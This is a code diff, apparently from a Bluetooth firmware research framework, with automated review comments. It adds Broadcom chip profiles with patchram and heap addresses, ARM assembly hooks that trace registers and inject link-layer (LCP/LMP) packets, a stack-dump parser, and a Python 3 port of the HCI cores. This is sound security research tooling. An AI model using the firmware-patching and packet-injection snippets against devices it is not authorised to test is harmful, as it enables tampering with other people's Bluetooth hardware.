mov r1, 76 // buffer size: size of registers (68 bytes) + type and length + 'TRACE_'
bl 0xF7B6 // hci_allocateEventBlockWithLen(0xff, 78)
mov r4, r0 // save pointer to the buffer in r4
// append our custom header (the word 'TRACE_') after the event code and event length field
add r0, 2 // write after the length field
ldr r1, =0x43415254 // 'TRAC'
str r1, [r0]
add r0, 4 // advance the pointer.
ldr r1, =0x5f45 // 'E_'
strh r1, [r0]
add r0, 2 // advance the pointer. r0 now points to the start of the register values
// store pc
str r6, [r0] // r6 still contains the address of the original pc
add r0, 4 // advance the pointer.
// store sp
mov r1, 56 // 14 saved registers * 4
add r1, sp
str r1, [r0]
add r0, 4 // advance the pointer.
// store status register
str r5, [r0]
add r0, 4 // advance the pointer.
// store other registers
mov r1, sp
mov r2, 56
bl 0xAF0BC // memcpy(dst, src, len)
// send HCI buffer to the host
mov r0, r4 // r4 still points to the beginning of the HCI buffer
bl 0xF782 // hci_sendEvent
// restore status register
msr cpsr_f, r5
bl 0x2D702 // bthci_event_vs_DBFW_CoreDumpRAMImageEvent
mov lr, r8 // restore lr from r8
bx lr // return
"""
+41
@@ -0,0 +1,41 @@
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# iPhone 8/X/XR
FW_NAME = "BCM4347B1"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x00103fff, True, False), # Internal ROM
MemorySection(0x00130000, 0x0014ffff, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200000, 0x0024ffff, False, True), # Internal Memory Cortex M3
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
PATCHRAM_VALUE_TABLE_ADDRESS = 0x130000
PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = False
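Review bot: same template header as the Galaxy S8 file (`# fw_0x420e.py`, "Generic firmware file...") on what is the iPhone 8/X/XR BCM4347B1 profile; replace it with the real file name and description. Unlike the S8 profile this file defines no BLOC_HEAD/BLOC_NG, so heap inspection will not work here; a one-line comment saying whether the heap layout is unknown or intentionally omitted avoids the question later.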
+1 -1
@@ -22,7 +22,7 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
FW_NAME = "BCM2070B0 (MacBook Pro 2011)"
+7 -1
@@ -20,7 +20,7 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# This runs on an iPhone 7
@@ -46,3 +46,9 @@ SECTIONS = [ MemorySection(0x0, 0x90000, True , False),
MemorySection(0x650000, 0x650800, False, False),
#MemorySection(0x680000, 0x800000, False, False)
]
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 192
PATCHRAM_ALIGNED = False
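Review bot: `PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204` does not fit `PATCHRAM_NUMBER_OF_SLOTS = 192`: every other profile on this page places the bitmap 4 bytes after a table of slots*4 bytes (128 slots with 0x310204, 256 slots with 0x310404), so a 192-entry table starting at 0x310000 would extend to 0x3102ff and overlap a bitmap at 0x310204, and the expected value would be 0x310304. One of the two numbers should be re-checked on the device before this is merged.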
+20 -2
@@ -25,7 +25,7 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# This runs on Nexus 5, Xperia Z3, Samsung Galaxy Note 3
@@ -79,7 +79,25 @@ PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = True #use readMemAligned, not accessible via ReadRAM HCI command on Nexus 5
# Snippet for sendLmpPacket()
# Snippet for sendLcpPacket()
SENDLCP_CODE_BASE_ADDRESS = 0x00211900
SENDLCP_ASM_CODE = """
push {r4,lr}
// we want to call lmulp_sendLcp(conn_index, input, length)
mov r0, %d // connection index, starts at 0
ldr r1, =payload
mov r2, %d // length
bl 0x66760 // lmulp_sendLcp
pop {r4,pc} // go back
.align // The payload (LMP packet) must be 4-byte aligend (memcpy needs aligned addresses)
payload: // Note: the payload will be appended here by the sendLmpPacket() function
"""
# Snippet for sendLmpPacketLegacy()
SENDLMP_CODE_BASE_ADDRESS = 0xd7500
SENDLMP_ASM_CODE = """
push {r4,lr}
+24 -1
@@ -27,13 +27,14 @@
# Firmware Infos
# This runs on Rasperry Pi 3+
from builtins import object
FW_NAME = "BCM4345C0"
# Device Infos
DEVICE_NAME = 0x204954
# Memory Sections
class MemorySection:
class MemorySection(object):
def __init__(self, start_addr, end_addr, is_rom, is_ram):
self.start_addr = start_addr
self.end_addr = end_addr
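Review bot: `from builtins import object` lands under the "# Firmware Infos" comment, between the Raspberry Pi description and FW_NAME, where it reads as part of the firmware data; futurize inserted it before the first statement, but it belongs at the top of the module with any other imports. "Rasperry" in the comment above it is a typo.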
@@ -72,3 +73,25 @@ PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = False
# Heap
BLOC_HEAD = 0x200490 # g_dynamic_memory_GeneralUsePools
BLOC_NG = True # Next Generation Bloc Buffer
# Snippet for sendLcpPacket()
SENDLCP_CODE_BASE_ADDRESS = 0x21f000
SENDLCP_ASM_CODE = """
push {r4,lr}
// we want to call lmulp_sendLcp(conn_index, input, length)
mov r0, %d // connection index, starts at 0
ldr r1, =payload
mov r2, %d // length
bl 0x92062 // lmulp_sendLcp
pop {r4,pc} // go back
.align // The payload (LMP packet) must be 4-byte aligend (memcpy needs aligned addresses)
payload: // Note: the payload will be appended here by the sendLmpPacket() function
"""
+43
@@ -0,0 +1,43 @@
# fw_0x617e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# iPhone 6
FW_NAME = "BCM4345B0"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x000c07ff, True, False), # Internal ROM
MemorySection(0x000d0000, 0x000dffff, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200400, 0x00201cff, False, True), # Internal Memory Cortex M3
]
# Patchram
#PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000 #TODO needs to be aligned read
#PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
#PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
#PATCHRAM_NUMBER_OF_SLOTS = 128
#PATCHRAM_ALIGNED = True
# only seems to work 4-byte aligned here ...
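Review bot: with all five PATCHRAM_* lines commented out, any code that reads PATCHRAM_TARGET_TABLE_ADDRESS or PATCHRAM_NUMBER_OF_SLOTS from this profile fails with AttributeError unless fw.py supplies defaults; either define them with an explicit "unsupported" marker or document the fallback. The TODO "needs to be aligned read" together with the commented-out `PATCHRAM_ALIGNED = True` and the trailing "only seems to work 4-byte aligned here" suggests the intended fix is to enable PATCHRAM_ALIGNED (as the Nexus 5 profile does with its readMemAligned snippet) rather than to disable patchram support entirely.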
+43
@@ -0,0 +1,43 @@
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# iPhone SE
FW_NAME = "BCM4345C1"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x000c07ff, True, False), # Internal ROM
MemorySection(0x000d0000, 0x000dffff, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200400, 0x00201cff, False, True), # Internal Memory Cortex M3
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = False
# only seems to work 4-byte aligned here ...
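Review bot: `PATCHRAM_ALIGNED = False` is immediately followed by the comment "only seems to work 4-byte aligned here ...", which says the opposite; if aligned reads are required on BCM4345C1 the flag should be True (the Nexus 5 profile pairs that flag with its readMemAligned snippet), otherwise the comment should go. The header is again the template `# fw_0x420e.py` / "Generic firmware file..." for what is the iPhone SE profile.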
+2 -13
@@ -22,7 +22,7 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
FW_NAME = "default (unknown firmware)"
@@ -31,16 +31,5 @@ FW_NAME = "default (unknown firmware)"
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x0, 0x90000, True , False),
MemorySection(0xd0000, 0xd8000, False, True ),
#MemorySection(0xe0000, 0x1f0000, True , False),
MemorySection(0x200000, 0x228000, False, True ),
MemorySection(0x260000, 0x268000, True , False),
#MemorySection(0x280000, 0x2a0000, True , False),
MemorySection(0x318000, 0x320000, False, False),
MemorySection(0x324000, 0x360000, False, False),
MemorySection(0x362000, 0x362100, False, False),
MemorySection(0x363000, 0x363100, False, False),
MemorySection(0x600000, 0x600800, False, False),
MemorySection(0x640000, 0x640800, False, False),
MemorySection(0x650000, 0x650800, False, False),
#MemorySection(0x680000, 0x800000, False, False)
MemorySection(0x200000, 0x228000, False, True )
]
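Review bot: the default profile's SECTIONS now drop the 0xd0000 patchram RAM window together with the peripheral ranges, leaving only ROM at 0x0 and RAM at 0x200000; since this is exactly the profile used when the chip is unknown, a comment should say why the patchram window is no longer dumped, or it should stay if the removal was only meant for the ranges that hang some chips.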
+65 -10
@@ -25,6 +25,10 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import absolute_import
from builtins import hex
from builtins import range
from builtins import object
from pwn import *
HCI_UART_TYPE_CLASS = {}
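Review bot: the `from builtins import hex/range/object` shims add a runtime dependency on the `future` package; make sure it is declared in setup.py, otherwise this module fails at import time on a plain Python 2 install. Because `from pwn import *` follows them, any name pwntools exports under the same spelling silently wins; putting the star import first, or importing only the pwnlib names this file uses, removes the ambiguity.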
@@ -52,10 +56,11 @@ class HCI(object):
@staticmethod
def from_data(data):
uart_type = ord(data[0])
uart_type = data[0]
return HCI_UART_TYPE_CLASS[uart_type].from_data(data[1:])
def __init__(self, uart_type):
self.event_code = None
self.uart_type = uart_type
def getRaw(self):
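Review bot: `uart_type = data[0]` only yields an int when `data` is a bytearray or Python 3 bytes; on Python 2 a plain str gives a one-character string and the HCI_UART_TYPE_CLASS lookup raises KeyError. The HCICore receive thread now wraps records in bytearray, but iOSCore's reassembly buffer is still initialised as `""` and handed straight to parse_hci_packet, so that path breaks. The same assumption recurs in HCI_Cmd.from_data and HCI_Event.from_data; normalising once in HCI.from_data (`data = bytearray(data)`) would cover all three.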
@@ -214,7 +219,7 @@ class HCI_Cmd(HCI):
0x0c6c : "COMND Read_LE_Host_Support",
0x0c6d : "COMND Write_LE_Host_Support",
0x0c6e : "COMND Set_MWS_Channel_Parameters",
0x0c6f : "COMND Set_ External_Frame_Configuration",
0x0c6f : "COMND Set_External_Frame_Configuration",
0x0c70 : "COMND Set_MWS_Signaling",
0x0c71 : "COMND Set_MWS_Transport_Layer",
0x0c72 : "COMND Set_MWS_Scan_Frequency_Table",
@@ -572,7 +577,7 @@ class HCI_Cmd(HCI):
0xffed : "COMND VSC_EnterDownloadMode"
}
HCI_CMD_STR_REVERSE = {v: k for k, v in HCI_CMD_STR.iteritems()}
HCI_CMD_STR_REVERSE = {v: k for k, v in HCI_CMD_STR.items()}
@staticmethod
def cmd_name(opcode):
@@ -606,7 +611,7 @@ class HCI_Cmd(HCI):
@staticmethod
def from_data(data):
return HCI_Cmd(u16(data[0:2]), ord(data[2]), data[3:])
return HCI_Cmd(u16(data[0:2]), data[2], data[3:])
def __init__(self, opcode, length, data):
HCI.__init__(self, HCI.HCI_CMD)
@@ -622,7 +627,7 @@ class HCI_Cmd(HCI):
cmdname = "unknown"
if self.opcode in self.HCI_CMD_STR:
cmdname = self.HCI_CMD_STR[self.opcode]
return parent + "<0x%04x %s (len=%d): %s>" % (self.opcode, cmdname, self.length, self.data[0:16].encode('hex'))
return parent + "<0x%04x %s (len=%d): %s>" % (self.opcode, cmdname, self.length, ''.join(format(x, '02x') for x in self.data[0:16]))
class HCI_Acl(HCI):
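Review bot: `''.join(format(x, '02x') for x in self.data[0:16])` carries the same byte-vs-str assumption as from_data (format() on a one-character str raises on Python 2) and is repeated in HCI_Diag and HCI_Event; one hex helper that accepts str, bytes and bytearray, e.g. `binascii.hexlify(bytes(data)).decode()`, would replace the three copies and give a single place to fix.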
@@ -697,7 +702,7 @@ class HCI_Diag(HCI):
cmdname = "unknown"
if self.opcode in self.BCM_DIAG_STR:
cmdname = self.BCM_DIAG_STR[self.opcode]
return parent + "<0x%02x %s: %s>" % (self.opcode, cmdname, self.data[0:16].encode('hex'))
return parent + "<0x%02x %s: %s>" % (self.opcode, cmdname, ''.join(format(x, '02x') for x in self.data[0:16]))
class HCI_Event(HCI):
@@ -886,7 +891,7 @@ class HCI_Event(HCI):
@staticmethod
def from_data(data):
return HCI_Event(ord(data[0]), ord(data[1]), data[2:])
return HCI_Event(data[0], data[1], data[2:])
def __init__(self, event_code, length, data):
HCI.__init__(self, HCI.HCI_EVT)
@@ -902,7 +907,7 @@ class HCI_Event(HCI):
eventname = "unknown"
if self.event_code in self.HCI_EVENT_STR:
eventname = self.HCI_EVENT_STR[self.event_code]
return parent + "<0x%02x %s (len=%d): %s>" % (self.event_code, eventname, self.length, self.data[0:].encode('hex'))
return parent + "<0x%02x %s (len=%d): %s>" % (self.event_code, eventname, self.length, ''.join(format(x, '02x') for x in self.data[0:]))
HCI_UART_TYPE_CLASS = {
HCI.HCI_CMD : HCI_Cmd,
@@ -916,7 +921,7 @@ def parse_hci_packet(data):
return HCI.from_data(data)
class StackDumpReceiver:
class StackDumpReceiver(object):
memdump_addr = None
memdumps = {}
stack_dump_has_happend = False
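Review bot: while this class is being touched: `memdumps = {}` in the class body is a mutable shared by every StackDumpReceiver instance, and `self.memdumps[...] = data[4:]` further down mutates that shared dict, so a second receiver sees the first one's chunks; initialise it in __init__. `stack_dump_has_happend` is misspelled, though renaming it means touching the cores that read it too.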
@@ -937,8 +942,10 @@ class StackDumpReceiver:
self.handleNexus6pStackDump(hcipkt)
if hcipkt.data[0:4] == p32(0x039200f7):
self.handleNexus5StackDump(hcipkt)
# same header for S10 and evaluation board...
if hcipkt.data[0:2] == p16(0x031b): # generated by bthci_event_vs_initializeCoredumpHdr()
self.handleEvalStackDump(hcipkt)
self.handleS10StackDump(hcipkt)
def verifyChecksum(self, data):
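Review bot: the 0x031b header now triggers both handleEvalStackDump and handleS10StackDump on every packet, and each can call finishStackDump and return True, so one dump may be parsed and written out twice; dispatch once, either on a field that distinguishes the two formats or by calling the S10 handler only when the eval handler returned False.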
@@ -955,6 +962,7 @@ class StackDumpReceiver:
if self.memdump_addr == None:
self.memdump_addr = addr
self.memdumps[addr-self.memdump_addr] = data[4:]
log.debug("Stack dump handling addr %08x", addr-self.memdump_addr)
def finishStackDump(self):
dump = fit(self.memdumps)
@@ -1067,7 +1075,7 @@ class StackDumpReceiver:
'\n'.join([hex(x) for x in values])))
if data[0] == '\x02':
# This is the second stack dump event (contains register values)
log.warn("Received Stack-Dump Event (contains %d registers):" % (u8(data[1])))
log.warn("Received Evaluation Stack-Dump Event (contains %d registers):" % (u8(data[1])))
registers = "pc: 0x%08x lr: 0x%08x sp: 0x%08x r0: 0x%08x r1: 0x%08x\n" % \
(values[2], values[3], values[1], values[4], values[5])
registers += "r2: 0x%08x r3: 0x%08x r4: 0x%08x r5: 0x%08x r6: 0x%08x\n" % \
@@ -1089,4 +1097,51 @@ class StackDumpReceiver:
self.finishStackDump()
return True
# On a Raspberry Pi 3, the last packet of a stack dump is '1b0340df0338'.... so it's 0x40
elif packet_type == 0xe8:
# FIXME Raspi memdump is divided in two parts!
# address change from 0001fe38 to packet type e8 and then it's computing addr -0130000
# negative addr does not work with finishStackDump()
# so even though the last packet is 0x40, let's just finish on 0xe8
log.info("End of first stackdump block, writing to file and skipping second...")
self.finishStackDump()
return True
return False
def handleS10StackDump(self, hcipkt):
"""
Packets in stack dump:
1b 03 90: contains pc and r0
1b 03 9c
1b 03 00 (x3)
1b 03 f0 (whole ram)
"""
checksum_correct = self.verifyChecksum(hcipkt.data[3:])
packet_type = u8(hcipkt.data[2])
if packet_type == 0x90:
data = hcipkt.data[4:]
values = [u32(data[i:i+4]) for i in range(0, 64*2, 4)]
log.debug("Stack Dump (%s):\n%s" % ("checksum correct" if checksum_correct else "checksum NOT correct",
'\n'.join([hex(x) for x in values])))
# Values different than in other stack dump formats, experimental output!
log.warn("Received S10 Stack-Dump Event (contains %d registers):" % (u8(data[1])))
registers = "pc: 0x%08x lr: 0x%08x sp: 0x%08x r0: 0x%08x r1: 0x%08x\n" % \
(values[16], values[17], values[23], values[19], values[20])
registers += "r2: 0x%08x r3: 0x%08x r4: 0x%08x r5: 0x%08x r6: 0x%08x\n" % \
(values[21], values[22], values[23], values[24], values[25])
log.warn(registers)
return True
# log.info("%x" % u32(hcipkt.data[8:12]))
# no last packet for S10e, just the size counts here... also is sometimes longer and sometimes shorter
if packet_type == 0xf0 and u32(hcipkt.data[8:12]) == 0x230080:
# This is the last pkt ouput:
self.finishStackDump()
return True
return False
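Review bot: in handleS10StackDump the register printout uses `values[23]` both for sp (`(values[16], values[17], values[23], ...)`) and for r4 (`(values[21], values[22], values[23], ...)`), so one of the two is wrong; given the neighbouring indices, r4 is likely a different slot. `values` is built from 128 bytes of `data` with no length check, so a short 0x90 packet raises inside u32, and the "(contains %d registers)" count reads `data[1]`, copied from the other formats, although nothing here shows that the S10 packet carries a count there. The checksum result is only logged; a packet whose checksum fails should probably not be parsed. Typo: "ouput".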
+39 -16
@@ -1,14 +1,28 @@
#!/usr/bin/env python2
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import zip
from builtins import range
import subprocess
import datetime
from pwn import *
import fcntl
from core import InternalBlue
import hci
import Queue
from .core import InternalBlue
from . import hci
import queue as queue2k
import threading
try:
from typing import List
from internalblue import Device
except:
pass
# from /usr/include/bluetooth/hci.h:
#define HCIDEVUP _IOW('H', 201, int)
#define HCIGETDEVLIST _IOR('H', 210, int)
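Review bot: the `try: ... except: pass` around the typing imports is a bare except that also swallows KeyboardInterrupt and SyntaxError; use `except ImportError`. `from internalblue import Device` is an absolute import while the rest of this hunk switches to relative ones (`from .core import InternalBlue`, `from . import hci`); use the matching relative form. The `#!/usr/bin/env python2` shebang is now wrong for a file that has to run on both interpreters.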
@@ -27,11 +41,14 @@ HCIGETDEVINFO = _IOR(ord('H'), 211, 4)
class HCICore(InternalBlue):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory="."):
super(HCICore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory)
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory=".", replay=False):
super(HCICore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory, replay)
self.btsnooplog_file_lock = threading.Lock()
self.serial = False
self.doublecheck = False
def getHciDeviceList(self):
# type: () -> List[Device]
"""
Get a list of available HCI devices. The list is obtained by executing
ioctl syscalls HCIGETDEVLIST and HCIGETDEVINFO. The returned list
@@ -54,7 +71,7 @@ class HCICore(InternalBlue):
# Do ioctl(s,HCIGETDEVLIST,arg) to get the number of available devices:
# arg is struct hci_dev_list_req (/usr/include/bluetooth/hci.h)
arg = p32(16) # dl->dev_num = HCI_MAX_DEV which is 16 (little endian)
arg += "\x00"*(8*16)
arg += b"\x00"*(8*16)
devices_raw = fcntl.ioctl(s.fileno(), HCIGETDEVLIST, arg)
num_devices = u16(devices_raw[:2])
log.debug("Found %d HCI devices via ioctl(HCIGETDEVLIST)!" % num_devices)
@@ -65,10 +82,10 @@ class HCICore(InternalBlue):
dev_id = u16(devices_raw[dev_struct_start:dev_struct_start+2])
# arg is struct hci_dev_info (/usr/include/bluetooth/hci.h)
arg = p16(dev_id) # di->dev_id = <device_id>
arg += "\x00"*20 # Enough space for name, bdaddr and flags
dev_info_raw = fcntl.ioctl(s.fileno(), HCIGETDEVINFO, arg)
dev_name = dev_info_raw[2:10].replace("\x00","")
dev_bdaddr = ":".join(["%02X" % ord(x) for x in dev_info_raw[10:16][::-1]])
arg += b"\x00"*20 # Enough space for name, bdaddr and flags
dev_info_raw = bytearray(fcntl.ioctl(s.fileno(), HCIGETDEVINFO, arg))
dev_name = dev_info_raw[2:10].replace(b"\x00",b"").decode()
dev_bdaddr = ":".join(["%02X" % x for x in dev_info_raw[10:16][::-1]])
dev_flags = u32(dev_info_raw[16:20])
if dev_flags == 0:
dev_flags_str = "DOWN"
@@ -115,14 +132,15 @@ class HCICore(InternalBlue):
"""
Return a list of connected hci devices.
"""
if self.replay:
return [(self, "hci_replay", 'hci: ReplaySocket')]
device_list = []
for dev in self.getHciDeviceList():
log.info("HCI device: %s [%s] flags=%d<%s>" %
(dev["dev_name"], dev["dev_bdaddr"],
dev["dev_flags"], dev["dev_flags_str"]))
device_list.append([self, dev["dev_name"], 'hci: %s (%s) <%s>' %
(dev["dev_bdaddr"], dev["dev_name"], dev["dev_flags_str"])])
device_list.append((self, dev["dev_name"], 'hci: %s (%s) <%s>' %
(dev["dev_bdaddr"], dev["dev_name"], dev["dev_flags_str"])))
if len(device_list) == 0:
log.info('No connected HCI device found')
@@ -180,8 +198,13 @@ class HCICore(InternalBlue):
# Read the record data
try:
record_data = self.s_snoop.recv(1024)
record_data = bytearray(record_data)
except socket.timeout:
continue # this is ok. just try again without error
except Exception as e:
log.critical("Lost device interface with exception {}, terminating receive thread...".format(e))
self.exit_requested = True
continue
# btsnoop record header data:
btsnoop_orig_len = len(record_data)
@@ -211,7 +234,7 @@ class HCICore(InternalBlue):
if filter_function == None or filter_function(record):
try:
queue.put(record, block=False)
except Queue.Full:
except queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..")
# Call all callback functions inside registeredHciCallbacks and pass the
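Review bot: `except queue.Full:` is evaluated only after `queue.put` raises, and at that point `queue` is the loop variable bound to a Queue instance (`for queue, filter_function in self.registeredHciRecvQueues`), which has no attribute `Full`; the result is an AttributeError in the receive thread the first time a recv queue fills, the exact case this handler exists for. The module was imported as `queue2k`, so this must be `except queue2k.Full:` (or the loop variable renamed).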
@@ -262,7 +285,7 @@ class HCICore(InternalBlue):
"""
# TODO still seems to only forward incoming events?!
self.s_snoop.setsockopt(socket.SOL_HCI, socket.HCI_FILTER,
'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00') #type mask, event mask, event mask, opcode
b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00') #type mask, event mask, event mask, opcode
interface_num = device["dev_id"]
log.debug("Socket interface number: %s" % (interface_num))
@@ -276,7 +299,7 @@ class HCICore(InternalBlue):
# Write Header to btsnoop file (if file is still empty):
if self.write_btsnooplog and self.btsnooplog_file.tell() == 0:
# BT Snoop Header: btsnoop\x00, version: 1, data link type: 1002
btsnoop_hdr = "btsnoop\x00" + p32(1,endian="big") + p32(1002,endian="big")
btsnoop_hdr = b"btsnoop\x00" + p32(1,endian="big") + p32(1002,endian="big")
with self.btsnooplog_file_lock:
self.btsnooplog_file.write(btsnoop_hdr)
self.btsnooplog_file.flush()
+96 -29
@@ -1,12 +1,16 @@
#!/usr/bin/env python2
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str
import socket
import Queue
import hci
import queue as queue2k
from . import hci
from pwn import *
from core import InternalBlue
from .core import InternalBlue
class iOSCore(InternalBlue):
@@ -18,6 +22,9 @@ class iOSCore(InternalBlue):
exit(-1)
self.ios_addr = parts[0]
self.ios_port = parts[1]
self.serial = False
self.doublecheck = True
self.buffer = ""
def device_list(self):
"""
@@ -37,7 +44,7 @@ class iOSCore(InternalBlue):
return device_list
def sendH4(self, h4type, data, timeout=2):
def sendH4(self, h4type, data, timeout=0.5):
"""
Send an arbitrary HCI packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
@@ -46,16 +53,16 @@ class iOSCore(InternalBlue):
the command or None if no response was received within the timeout.
"""
queue = Queue.Queue(1)
queue = queue2k.Queue(1)
try:
self.sendQueue.put((h4type, data, queue, None), timeout=timeout)
ret = queue.get(timeout=timeout)
return ret
except Queue.Empty:
except queue2k.Empty:
log.warn("sendH4: waiting for response timed out!")
return None
except Queue.Full:
except queue.Full:
log.warn("sendH4: send queue is full!")
return None
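Review bot: same shadowing bug as in hcicore: `queue = queue2k.Queue(1)` makes `queue` an instance, so `except queue.Full:` raises AttributeError instead of catching a full send queue; the `except queue2k.Empty:` two lines above shows the intended form. Dropping the default timeout from 2 to 0.5 s changes behaviour for every caller of sendH4; note the reason in the commit, or keep the old default and pass 0.5 where the iOS proxy needs it.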
@@ -85,13 +92,62 @@ class iOSCore(InternalBlue):
# with ios proxy the send and receive sockets are the same
self.s_snoop = self.s_inject
return True
def _getLatestH4Blob(self, new_data=""):
data_out = ""
self.buffer += new_data
if len(self.buffer) > 0:
# if the buffer is too small, wait for more data
if len(self.buffer) < 5:
return (None, False)
else:
#log.info(self.buffer[0].encode("hex"))
# for ACL data the length field is at offset 3
if self.buffer[0] == '\x02':
acl_len = struct.unpack_from("h", self.buffer[3:])[0]
required_len = acl_len + 5
# for HCI cmd data the length is at offset 3 (but just one byte)
elif self.buffer[0] == '\x01':
hci_len = struct.unpack_from("b", self.buffer[3:])[0]
required_len = hci_len + 4
# for HCI event data the length is at offset 2 (one byte)
elif self.buffer[0] == '\x04':
hci_len = struct.unpack_from("b", self.buffer[2:])[0]
required_len = hci_len + 3
# for BCM data the length should always be 64
elif self.buffer[0] == '\x07':
required_len = 64
# if we don't have all the data we need, we just wait for more
if len(self.buffer) < required_len:
#log.info("Not enough data, expected %d, got %d", required_len, len(self.buffer))
return (None, False)
# might be the case that we have too much
elif len(self.buffer) > required_len:
log.info("Got too much data, expected %d, got %d", required_len, len(self.buffer))
surplus = len(self.buffer) - required_len
new_buffer = self.buffer[required_len:len(self.buffer)]
data_out = self.buffer[:-surplus]
#log.info("new_buffer: %s, data_out: %s", new_buffer.encode("hex"), data_out.encode("hex"))
self.buffer = new_buffer
return (data_out, True)
# sometimes we even have just the right amout of data
else:
#log.info("Got exactly the right amount of data")
data_out = self.buffer
self.buffer = ""
return (data_out, False)
else:
return (None, False)
def _recvThreadFunc(self):
log.debug("Receive Thread started.")
if (self.write_btsnooplog):
if self.write_btsnooplog:
log.warn("Writing btsnooplog is not supported with iOS.")
while not self.exit_requested:
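Review bot: _getLatestH4Blob leaves `required_len` unassigned when the first byte is none of 0x01/0x02/0x04/0x07, so the following `if len(self.buffer) < required_len` raises UnboundLocalError instead of resynchronising; handle the unknown type explicitly (log it and drop a byte, or clear the buffer). The struct formats are also wrong for the protocol: `"h"` and `"b"` are signed, so an ACL length of 0x8000 or more, or an HCI length of 128 or more, becomes negative and required_len comes out too small; use `"<H"` and `"B"`. The `== '\x02'` comparisons assume a str buffer and are always False for bytes or bytearray on Python 3.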
@@ -100,33 +156,44 @@ class iOSCore(InternalBlue):
# read record data
try:
record_data = self.s_snoop.recv(1024)
received_data = self.s_snoop.recv(1024)
except socket.timeout:
continue # this is ok. just try again without error
# because the iOS socket is rather unreliable (blame the iOS proxy developer) we
# need to do some length checks and get the H4/HCI data in the right format
